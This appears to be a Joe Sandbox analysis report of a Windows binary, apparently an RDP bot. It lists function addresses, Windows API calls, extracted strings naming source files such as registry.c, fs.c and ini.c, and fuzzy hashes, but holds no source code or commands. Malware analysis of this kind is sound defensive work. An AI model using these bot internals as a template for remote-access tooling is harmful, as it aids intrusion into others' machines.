                                                                                                                                                  • String ID: (key != NULL)$(root != NULL)$?$H:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegCreateKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_create_key
                                                                                                                                                  • API String ID: 2932200918-412249795
                                                                                                                                                  • Opcode ID: 6ae6085569b0b128f2829ddf323c1c9bd220a946938d24aec418bc5112106390
                                                                                                                                                  • Instruction ID: fc412152dcb1f93a338eb4601a224a2f6accbdef62d5ae3a8f0e6cba3351b2ba
                                                                                                                                                  • Opcode Fuzzy Hash: 6ae6085569b0b128f2829ddf323c1c9bd220a946938d24aec418bc5112106390
                                                                                                                                                  • Instruction Fuzzy Hash: E6518C62E0C65382FA348B4CE650BB96271AF38798F450232FB4DD76A4DF2CE965C740
                                                                                                                                                  Function 00007FF6BE036E31 Relevance: 19.6, APIs: 6, Strings: 7, Instructions: 89memorystringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Processstrlen$AllocFree
                                                                                                                                                  • String ID: (buf != NULL)$(buf_sz != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
                                                                                                                                                  • API String ID: 1318626975-3508512667
                                                                                                                                                  • Opcode ID: 23c25e1e43872f11b7c221eb26cc025d7b25fdb3589f9502fa49bb7de2773936
                                                                                                                                                  • Instruction ID: 660e75b65e84f976d72f4303e5a14e7a70db450e2864d2b3b882a33b987a84e4
                                                                                                                                                  • Opcode Fuzzy Hash: 23c25e1e43872f11b7c221eb26cc025d7b25fdb3589f9502fa49bb7de2773936
                                                                                                                                                  • Instruction Fuzzy Hash: 5E314F61A09A4785FB61DB59E9007B922B0AF78B84F444033FB4D97799EF3CE9258340
                                                                                                                                                  Function 00007FF6BE031AA4 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesFile$ErrorLast
                                                                                                                                                  • String ID: (attr != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
                                                                                                                                                  • API String ID: 365566950-3523202656
                                                                                                                                                  • Opcode ID: fba0ecf9b2fd32c2783afca412e872a6bfb29fdb93f941ce1adacbeddb62f5a9
                                                                                                                                                  • Instruction ID: e29477588a6d77d8ae4dbd7d3256d9acb54da53a2380a720465a9ec39bb5ae3d
                                                                                                                                                  • Opcode Fuzzy Hash: fba0ecf9b2fd32c2783afca412e872a6bfb29fdb93f941ce1adacbeddb62f5a9
                                                                                                                                                  • Instruction Fuzzy Hash: ED516B61E1C64786FA709B2CA540AB93270AF7C388F105532FB1EC7695EE2CE865C706
                                                                                                                                                  Function 00007FF6BE0351B8 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Deletefflushfwrite
                                                                                                                                                  • String ID: (key != NULL)$(root != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegDeleteKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_delete_key$u
                                                                                                                                                  • API String ID: 2939363742-2883486457
                                                                                                                                                  • Opcode ID: 34cc719e758498ff3f5489aabb9cd898e567fd625eb41d34a7d79cb5500c1887
                                                                                                                                                  • Instruction ID: b018f581e77ed5fc977d37830963118869ae4db71f34345779f675f1a374d1b9
                                                                                                                                                  • Opcode Fuzzy Hash: 34cc719e758498ff3f5489aabb9cd898e567fd625eb41d34a7d79cb5500c1887
                                                                                                                                                  • Instruction Fuzzy Hash: 53416F62E0C51391FA30978CA541BBC62606F39754F590133FF4DEB2B5DE9CADA58381
                                                                                                                                                  Function 00007FF6BE034175 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 113fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • UnlockFileEx.KERNEL32(?,?,?,?,?,?,00000000,000002234F5413D0,?,00007FF6BE0389CF,?,?,00000000,00007FF6BE038CE3), ref: 00007FF6BE0341BD
                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,000002234F5413D0,?,00007FF6BE0389CF,?,?,00000000,00007FF6BE038CE3), ref: 00007FF6BE0341CE
                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000002234F5413D0,?,00007FF6BE0389CF,?,?,00000000,00007FF6BE038CE3), ref: 00007FF6BE034284
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseErrorFileHandleLastUnlockfflushfwrite
                                                                                                                                                  • String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
                                                                                                                                                  • API String ID: 497672076-345319545
                                                                                                                                                  • Opcode ID: 3554e282eaab8ff449155fc4f431d16e4112704c9d70c85bba0ee0f3199562b2
                                                                                                                                                  • Instruction ID: a9c3c72ddb8c1269af34ea208c0adea9ec8c0b5e66235a5826f9be5330a8d4b5
                                                                                                                                                  • Opcode Fuzzy Hash: 3554e282eaab8ff449155fc4f431d16e4112704c9d70c85bba0ee0f3199562b2
                                                                                                                                                  • Instruction Fuzzy Hash: 8C418F61F0C54391FA30875CE501FBC6231AFB9798F500233E76EAB5E4EE2CA9658301
                                                                                                                                                  Function 00007FF6BE038EC2 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 80COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorGlobalLastMemoryStatus
                                                                                                                                                  • String ID: $(mi != NULL)$;$H:/Projects/rdp/bot/codebase/sys.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GlobalMemoryStatusEx failed(gle=%lu)$sys_mem_info$~
                                                                                                                                                  • API String ID: 3848946878-1815531218
                                                                                                                                                  • Opcode ID: 64357a0d2701ce6cb47b199e1d8ad9681c7efc84054f499d3512793b06b170f8
                                                                                                                                                  • Instruction ID: 58311ab411aac1423231efc26c96e487611c711c2d3e27f7daf3bd428d4367e2
                                                                                                                                                  • Opcode Fuzzy Hash: 64357a0d2701ce6cb47b199e1d8ad9681c7efc84054f499d3512793b06b170f8
                                                                                                                                                  • Instruction Fuzzy Hash: 10312711E0C28386FB70875C9580B786260AF7C309F615173E70E869D9DE6EAEB5D316
                                                                                                                                                  Function 00007FF6BE034972 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 73COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000104,?,00000104,RDP-Controller.lock,00007FF6BE034AD5,?,?,?,?,?,000002234F5413D0,00007FF6BE034BE5), ref: 00007FF6BE0349A1
                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000104,?,00000104,RDP-Controller.lock,00007FF6BE034AD5,?,?,?,?,?,000002234F5413D0,00007FF6BE034BE5), ref: 00007FF6BE0349AC
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFileLastModuleName
                                                                                                                                                  • String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$RDP-Controller.lock$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path
                                                                                                                                                  • API String ID: 2776309574-725851072
                                                                                                                                                  • Opcode ID: 73dc7f982d333ff26df20f3414a7d8ae82d516df5c2918ed58daea4cf099c28a
                                                                                                                                                  • Instruction ID: f3e4cfbddce2d94f6e378a84dadebeee7736c21f1d85f3f4402cab6522143c5f
                                                                                                                                                  • Opcode Fuzzy Hash: 73dc7f982d333ff26df20f3414a7d8ae82d516df5c2918ed58daea4cf099c28a
                                                                                                                                                  • Instruction Fuzzy Hash: A73130A1E08A5795FA20DB5CEA017B52271BF78398F844033FB8DDB595EE3CA925C340
                                                                                                                                                  Function 00007FF6BE033835 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 161fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFileLast$CloseCreateHandleSize
                                                                                                                                                  • String ID: (path != NULL)$(size != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
                                                                                                                                                  • API String ID: 3555958901-3761180060
                                                                                                                                                  • Opcode ID: 2260640c85da3b0d1eec961e41a2cfeb455404a6e6d07f7efe87d2b4bab003e1
                                                                                                                                                  • Instruction ID: 363eff64f89f970bba5b6fc2f4aeadc37967290ff8213c7a0a46b054816b9519
                                                                                                                                                  • Opcode Fuzzy Hash: 2260640c85da3b0d1eec961e41a2cfeb455404a6e6d07f7efe87d2b4bab003e1
                                                                                                                                                  • Instruction Fuzzy Hash: EC614E11D0C75382F670471CA184B7D51609F7836AF290632FB6EDBBD4DE2DACA99382
                                                                                                                                                  Function 00007FF6BE033B56 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 129filetimeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$CloseCreateErrorHandleLastTime
                                                                                                                                                  • String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
                                                                                                                                                  • API String ID: 2291555494-1574117953
                                                                                                                                                  • Opcode ID: cc0d7606d5d0a2fa097d4fa6822c57d715a1e4d8514272c53164d401d9c15be8
                                                                                                                                                  • Instruction ID: 1161d5943fd09f83103f69cd446bebd129391be155cb3f85d7a936b38ada9b21
                                                                                                                                                  • Opcode Fuzzy Hash: cc0d7606d5d0a2fa097d4fa6822c57d715a1e4d8514272c53164d401d9c15be8
                                                                                                                                                  • Instruction Fuzzy Hash: 3E517361D1C14382FB304B1CA585B796160AF387AAF184232FB6EDB6D4DF3CAD658341
                                                                                                                                                  Function 00007FF6BE0369C0 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 70stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$strtol
                                                                                                                                                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
                                                                                                                                                  • API String ID: 3596500743-1951032453
                                                                                                                                                  • Opcode ID: 238c79f2b28e87de002f3402ad78c006d43888cb07f7983ebb66f4b32daff710
                                                                                                                                                  • Instruction ID: 4f287d754d5645bfc6ecc14895da8170c8dc27c630e37e4ff575c15b93ae4af6
                                                                                                                                                  • Opcode Fuzzy Hash: 238c79f2b28e87de002f3402ad78c006d43888cb07f7983ebb66f4b32daff710
                                                                                                                                                  • Instruction Fuzzy Hash: C5216021A08A4792E721DB19F940BAA7770FB68784F444132FF4C87664DF3CD9A6CB00
                                                                                                                                                  Function 00007FF6BE036CB4 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$_strtoui64
                                                                                                                                                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                                                                                                  • API String ID: 3513630032-2069802722
                                                                                                                                                  • Opcode ID: 42a5c2173597e114f9880ba43546d7a88f42eec6ff72c2f0a33b3ace71511f2e
                                                                                                                                                  • Instruction ID: 329de3270db286011740fb53ad373df4a84438c47686b3c3102ff9ce8a44e1cb
                                                                                                                                                  • Opcode Fuzzy Hash: 42a5c2173597e114f9880ba43546d7a88f42eec6ff72c2f0a33b3ace71511f2e
                                                                                                                                                  • Instruction Fuzzy Hash: E5213722A08A4696E721DF19F940BAA23B5FB69784F444036FF8C87664DF3CD9A5C700
                                                                                                                                                  Function 00007FF6BE034BC4 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 57stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$_mbscat
                                                                                                                                                  • String ID: (file_path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file$service
                                                                                                                                                  • API String ID: 3951308622-2217284372
                                                                                                                                                  • Opcode ID: b8b76ab31a40a3d4960c29d1d6da39be99acdea2726b26025418f3b2195c7509
                                                                                                                                                  • Instruction ID: aad0b254e60e1e427561df503e61bf117e83648400cc6bef12ff7d47d5983c1b
                                                                                                                                                  • Opcode Fuzzy Hash: b8b76ab31a40a3d4960c29d1d6da39be99acdea2726b26025418f3b2195c7509
                                                                                                                                                  • Instruction Fuzzy Hash: 59118161A0868784FA259F2DAD11BB956A19F79B88F4C8131EF4D8F286DE2CD4258340
                                                                                                                                                  Function 00007FF6BE036790 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                                                                                                                                  • API String ID: 1004003707-2568489879
                                                                                                                                                  • Opcode ID: 2e1ec48f1ce53da15b288e546176908832de149df3b5402700c5c2fba8d6dfb2
                                                                                                                                                  • Instruction ID: d0b76e397b19ea9ccc6f52c09594a286bacd4e1facc8e1ebb2115a0801954b94
                                                                                                                                                  • Opcode Fuzzy Hash: 2e1ec48f1ce53da15b288e546176908832de149df3b5402700c5c2fba8d6dfb2
                                                                                                                                                  • Instruction Fuzzy Hash: EA411B61E0964792FA24DB48B940BB86370BB38344F844637FB5D9A595DF3CE96AC300
                                                                                                                                                  Function 00007FF6BE036609 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                                                                                                                                  • API String ID: 1004003707-3977765790
                                                                                                                                                  • Opcode ID: ddacccf6af20dea2d09e73c8ab2f8e8bbf93bd688b8492cfa30044c9ac5ab41e
                                                                                                                                                  • Instruction ID: 5703abd0cd96b6ef9ff74888491e23149d0e37feefe5fb67744c3ebaa6c0667d
                                                                                                                                                  • Opcode Fuzzy Hash: ddacccf6af20dea2d09e73c8ab2f8e8bbf93bd688b8492cfa30044c9ac5ab41e
